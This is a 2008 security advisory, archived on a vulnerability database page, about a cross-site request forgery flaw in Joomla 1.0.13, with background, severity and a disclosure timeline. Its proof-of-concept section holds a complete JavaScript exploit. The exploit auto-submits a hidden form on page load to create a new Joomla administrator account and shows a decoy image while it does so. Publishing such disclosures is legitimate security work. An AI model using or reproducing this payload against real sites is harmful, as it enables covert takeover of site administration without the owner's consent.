Lucene search
K

joomla1013-csrf.txt

🗓️ 08 Jan 2008 00:00:00Reported by J. Carlos NietoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Joomla 1.0.13 CSRF vulnerabilit

Code
`Author: Jose Carlos Nieto.  
  
Date: Jan 08, 2008  
  
Severity: Mild  
  
There exists a Cross Site Request Forgery security hole in Joomla 1.0.13.  
  
  
Background  
==========  
  
*Joomla!* is a free <http://en.wikipedia.org/wiki/Free_software>, open source <http://en.wikipedia.org/wiki/Open_source_software> content management system <http://en.wikipedia.org/wiki/Content_management_system> for publishing content  
on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets <http://en.wikipedia.org/wiki/Intranet>.  
Joomla! is licensed under the GPL <http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork <http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo <http://en.wikipedia.org/wiki/Mambo_%28CMS%29>.  
  
  
Severity  
========  
Mild. It requires an administrator to be logged in and to be tricked into a specially  
crafted webpage.  
  
  
Summary  
=======  
Joomla! has no CSRF protection. A malicious user can trick an administrator into viewing  
a specially crafted webpage containing an exploit, this exploit can execute (without permission)  
any command the administrator would normally execute, such as publish a content or even add a new  
administrator.  
  
  
Solution  
========  
This problem has no solution at this time.  
  
  
Disclosure timeline  
===================  
Oct 18 2007 - Vulnerability found.  
Oct 18 2007 - Vulnerability reported to vendor.  
Oct 18 2007 - Answer from vendor.  
Jan 08 2008 - Advisory released.  
  
  
Proof of Concept  
================  
  
If a logged in administrator visits this page a new administrator will be added to the victim's  
Joomla powered website.  
  
---- exploit code ----  
  
<script type="text/javascript">  
  
window.onload = function() {  
  
var url = "http://joomlasite.com/joomla/administrator/index2.php";  
  
  
var gid = 25;  
  
var user = 'custom_username';  
  
var pass = 'custom_password';  
  
var email = '[email protected]';  
  
var param = {  
  
name: user,  
  
username: user,  
  
email: email,  
  
password: pass,  
  
password2: pass,  
  
gid: gid,  
  
block: 0,  
  
option: 'com_users',  
  
task: 'save',  
  
sendEmail: 1  
  
};  
  
  
var form = document.createElement('form');  
  
form.action = url;  
  
form.method = 'post';  
  
form.target = 'hidden';  
  
form.style.display = 'none';  
  
  
for (var i in param) {  
  
try {  
  
// ie  
  
var input = document.createElement('<input name="'+i+'">');  
  
} catch(e) {  
  
// other browsers  
  
var input = document.createElement('input');  
  
input.name = i;  
  
}  
  
input.setAttribute('value', param[i]);  
  
form.appendChild(input);  
  
}  
  
document.body.appendChild(form);  
  
  
form.submit();  
  
}  
  
</script>  
  
  
<iframe name="hidden" style="display: none"></iframe>  
  
  
<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">  
  
---- exploit code ----  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4
20